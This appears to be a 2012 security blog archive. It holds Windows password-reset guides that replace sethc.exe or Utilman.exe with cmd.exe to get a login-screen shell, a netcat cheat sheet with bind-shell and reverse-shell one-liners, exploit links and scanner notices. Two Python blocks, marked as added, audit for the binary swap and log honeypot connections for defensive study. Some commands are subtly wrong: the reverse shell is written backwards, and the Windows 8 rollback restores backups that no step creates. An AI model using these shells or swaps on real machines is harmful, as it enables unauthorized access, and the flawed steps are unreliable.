Dec 15, 2012

PHP Application Security Checklist

Download it from Source.


Source: http://www.sk89q.com/content/2010/04/phpsec_cheatsheet.pdf 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 14, 2012

Howto: Reset a forgotten Windows 7 password

This post just summarizes the steps from the Source; if you want to see the picture for each step, please go to the Source.

1. Create the System Repair Disk (Start button -> All Programs -> Maintenance -> Create a System Repair Disk)

2. Reboot and load the System Repair Disk

3. In the menu, after choosing the disk, click Command Prompt

4. copy c:\windows\system32\sethc.exe c:

5. copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

6. Reboot and wait at the login screen

7. Press the Shift key 5 times; you will get a command prompt

8. Type the command "net user username password"

9. Now you can log in with your new password

10. To restore the original sethc.exe afterwards, use
copy c:\sethc.exe c:\windows\system32\sethc.exe


Source: http://reboot.pro/topic/15751-reset-a-forgotten-windows-7-password-without-using-any-third-party-software-how-to-tutorial/ 


Howto: Reset a forgotten Windows 8 Password

This post just summarizes the steps from the Source; if you want to see the picture for each step, please go to the Source.

1. Make a System Rescue CD (go to Control Panel and navigate to Windows 7 File Recovery, click on that icon, and on the next screen choose Create a System Recovery Disk at the top left, then follow the on-screen instructions to make the CD).

2. Reboot Windows and boot from your System Rescue CD.

3. When you're in the System Rescue CD, choose Troubleshoot -> Advanced options -> Command Prompt

4. In the command prompt, run 'diskpart'

5. In diskpart, run 'list vol'

6. Locate the Windows partition; normally it will be C

7. Exit to the Command Prompt with the exit command

8. Type C: -> cd windows/system32/

9. Replace Utilman.exe with cmd.exe: del Utilman.exe -> ren cmd.exe Utilman.exe (You should back up each file before replacing it.)

10. Restart with "shutdown -r -t 00"

11. After the restart, click the "Ease Of Access Center" in the left corner of the login screen.

12. You will now get the Command Prompt.

13. Type "net user" to list the users on the PC.

14. Type "net user administrator *" to change the administrator password; you can replace administrator with any other user whose password you want to change.

15. Change the password

16. Exit to the login screen and use your new password to log in to Windows 8

17. To roll back the changes, use
 17.1 Type: c:
 17.2 Type: cd /windows/system32/
 17.3 Type: del Utilman.exe
 17.4 Type: ren Utilman.exe.original Utilman.exe
 17.5 Type: ren cmd.exe.original cmd.exe
 17.6 Type: shutdown -r -t 00

Source: http://reboot.pro/topic/17872-reset-a-windows-8-password-without-using-any-third-party-software/
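
Both procedures above (Windows 7 and Windows 8) leave traces on disk that an administrator can audit for. The following check is an added example, not part of the original posts or their sources; the function names and the list of indicators are assumptions derived from the file names used in the steps.

```python
import hashlib
import os
from pathlib import Path

ACCESSIBILITY = ("sethc.exe", "Utilman.exe")    # names the page's steps overwrite
SHELL_COPIES = ("cmd.exe", "cmd.exe.original")  # where a copy of the shell may sit
LEFTOVERS = ("Utilman.exe.original", "cmd.exe.original")  # backups from step 17


def sha256(path: Path) -> str:
    """Hash a file in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def audit(system32: Path, drive_root: Path) -> list:
    """Return findings consistent with the sethc.exe / Utilman.exe swap."""
    findings = []
    shells = {sha256(system32 / n): n for n in SHELL_COPIES if (system32 / n).is_file()}
    for name in ACCESSIBILITY:
        target = system32 / name
        if not target.is_file():
            findings.append(f"{name} is missing from System32")
            continue
        match = shells.get(sha256(target))
        if match:
            findings.append(f"{name} has the same SHA-256 as {match}")
    if not (system32 / "cmd.exe").is_file():
        findings.append("cmd.exe is missing from System32 (renamed away?)")
    for name in LEFTOVERS:
        if (system32 / name).is_file():
            findings.append(f"backup file {name} left in System32")
    if (drive_root / "sethc.exe").is_file():
        findings.append("copy of sethc.exe found in the drive root")
    return findings


if __name__ == "__main__":
    # Assumes the default layout %SystemDrive%\Windows\System32. Run with 64-bit
    # Python: a 32-bit process is silently redirected to SysWOW64.
    root = Path(os.environ.get("SystemDrive", "C:") + "\\")
    for finding in audit(root / "Windows" / "System32", root):
        print("FINDING:", finding)
```

Because cmd.exe is itself a Microsoft-signed binary, a signature check on sethc.exe or Utilman.exe still passes after the swap; the hash comparison, or the OriginalFilename field in the file's version resource, is what exposes it.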
     

   


Dec 13, 2012

Howto: Netcat: TCP/IP Swiss Army Knife

Port Scanning: The act of systematically scanning a host for open ports. Once determined, these open ports can be utilized to gain access to the host or to launch an attack.
Banner Grabbing: A fingerprinting technique aimed at extracting information about a host, such as the operating system, web server, applications etc. A simple form of banner grabbing is to send a request and analyze the response received.
Port Redirection: A simple technique used to transfer traffic from one port to another. It is utilized to access services which are restricted in any specific environment.
Honeypot: A Honeypot is a monitored decoy used to attract attackers away from critical resources and also a tool to analyze an attacker’s methods and characteristics. It can emulate various services provided by an OS and also generate responses for those services. It provides an environment which is capable of interacting with an attacker and monitors his/her activities without any real resources at risk.
First of all let’s see all the options provided by Netcat:
root@bt:~# nc -h
[v1.10-38]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, ...
        -h                      this cruft
        -i secs                 delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -T tos                  set Type Of Service
        -t                      answer TELNET negotiation
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').


1. Client-Server
1.1. Server
nc -l -p 9999
1.2. Client
nc server_ip 9999

2. Port Scanning
nc -v -w 2 -z target_ip 1-204

3. Banner Grabbing
nc -vv target_ip 80

4. Port Forwarding
nc -l -p listen_port -c "nc destination destination_port"

5. File Transfer
5.1 Server
nc -lv -p 9999 > save.file
5.2 Client
nc target_ip 9999 < target.file

6. Honeypot
For this we need to set up Netcat in listen mode on a specific port and send a user-defined output to the incoming connection.
nc -lvvp 443 < apache2.txt
nc target_ip 443

7. Backdoor
Bind Shell
7.1 Victim
nc -lvvp 9999 -e cmd.exe
7.2 Hacker
nc -v victim_ip 9999

Reverse Shell
7.1 Victim
nc -lvvp 9999
7.2 Hacker
nc -v victim_ip 9999 -e /bin/bash


Source: http://resources.infosecinstitute.com/netcat-tcpip-swiss-army-knife/
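
The honeypot in item 6 answers one connection with a canned file and records nothing structured about the caller. The listener below is an added example, not code from the original article: it sends a canned banner like the netcat one-liner, but keeps running and writes one JSON record per connection with the source address and the first bytes the client sent. The banner text, port 8443 and the log file name are constructed values.

```python
import json
import socket
import time

# Constructed canned response, standing in for the page's apache2.txt.
BANNER = (b"HTTP/1.1 200 OK\r\nServer: Apache/2.2.22 (Ubuntu)\r\n"
          b"Content-Length: 0\r\nConnection: close\r\n\r\n")


def handle(conn, peer, banner=BANNER, wait=3.0):
    """Send the canned banner, capture the client's first bytes, return a log record."""
    record = {"ts": time.time(), "src_ip": peer[0], "src_port": peer[1], "data": ""}
    conn.settimeout(wait)
    try:
        conn.sendall(banner)
        # latin-1 maps every byte to one character, so binary probes survive logging
        record["data"] = conn.recv(1024).decode("latin-1")
    except OSError:
        pass  # timeouts and resets: a connect-only scan still produces a record
    finally:
        conn.close()
    return record


def serve(port, logfile, bind="0.0.0.0"):
    """Accept connections one at a time, appending one JSON line per connection."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind, port))
        srv.listen(16)
        while True:
            conn, peer = srv.accept()
            with open(logfile, "a", encoding="utf-8") as log:
                log.write(json.dumps(handle(conn, peer)) + "\n")


if __name__ == "__main__":
    serve(8443, "honeypot.jsonl")  # unprivileged port; both values are examples
```

A zero-I/O scan such as the one in item 2 shows up here as a record with an empty data field, which is itself a useful signal.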



Dec 12, 2012

Topera - TCP Port Scanner IPV6

Topera is a brand new TCP port scanner under IPv6, with the particularity that these scans are not detected by Snort.  

Source: http://code.google.com/p/topera/


Interesting Exploit in 2012-12-12

1. Snare Agent Linux Password Disclosure / CSRF Vulnerabilities
 http://1337day.com/exploit/19941

2.  Smartphone Pentest Framework 0.1.3 / 0.1.4 Command Injection
http://1337day.com/exploit/19942

3. Nagios Core 3.4.3 Buffer Overflow Vulnerability
http://1337day.com/exploit/19943

4. WordPress 3.5 multiple path disclosure vulnerabilities
http://1337day.com/exploits/19944

5. Microsoft windows remote desktop PoC C# Exploit
http://1337day.com/exploit/19946

6. WordPress ABC Test Plugin 0.1 Cross Site Script XSS
http://1337day.com/exploit/19947

7. WordPress ABC Test Plugin directory traversal
http://1337day.com/exploit/19948







WiFi Monitor Mode with Android PCAP Capture

Required:
- An Android device which supports USB host mode (devices such as the Galaxy Nexus or Nexus 7 should work)

- A wireless USB adapter with the RTL8187 chipset.

1. Install "Android PCAP Capture", which was created by Mike "dragorn" Kershaw.

2. Connect the USB On-The-Go adapter to the Android device and to the wireless USB device.

3. Open Android PCAP Capture and start capturing traffic with your wireless USB device.

4. Transfer the pcap to your PC to analyze the pcap file.


Source: http://www.thepowerbase.com/2012/12/wifi-monitor-mode-with-android-pcap-capture/



Honeyproxy - Proxy to analyze HTTP(S) traffic


Features

  • Analyze HTTP(S) traffic on the fly
  • Filter and highlight traffic, regex support included.
  • Save HTTP conversations for later analysis
  • Make scripted changes with Python, e.g. remove Cache Header.
  • Based on and compatible with mitmproxy.
  • Cross-platform (Windows, OSX and Linux)
  • SSL interception certs generated on the fly
Source: http://honeyproxy.org/


Dec 10, 2012

Zeroday Of Authentication bypass FreeSSHD / FreeFTPD

Authentication bypass FreeSSHD / FreeFTPD
Posted on: December 9, 2012
Source: BUGTRAQ
SecurityVulns ID: 12755
Type: remote
Danger: 6/10
Description: Completion of the authorization is not checked when initiating client ssh session
Affected: WeOnlyDo : FreeSSHd 1/2
  WeOnlyDo : FreeFTPD 03/02
Files: FreeSSHD all version Remote Authentication Bypass ZERODAY

FreeFTPD all versions Remote System Level Exploit Zero-Day

Source: http://securityvulns.ru/news/FreeSSHD/AB.html
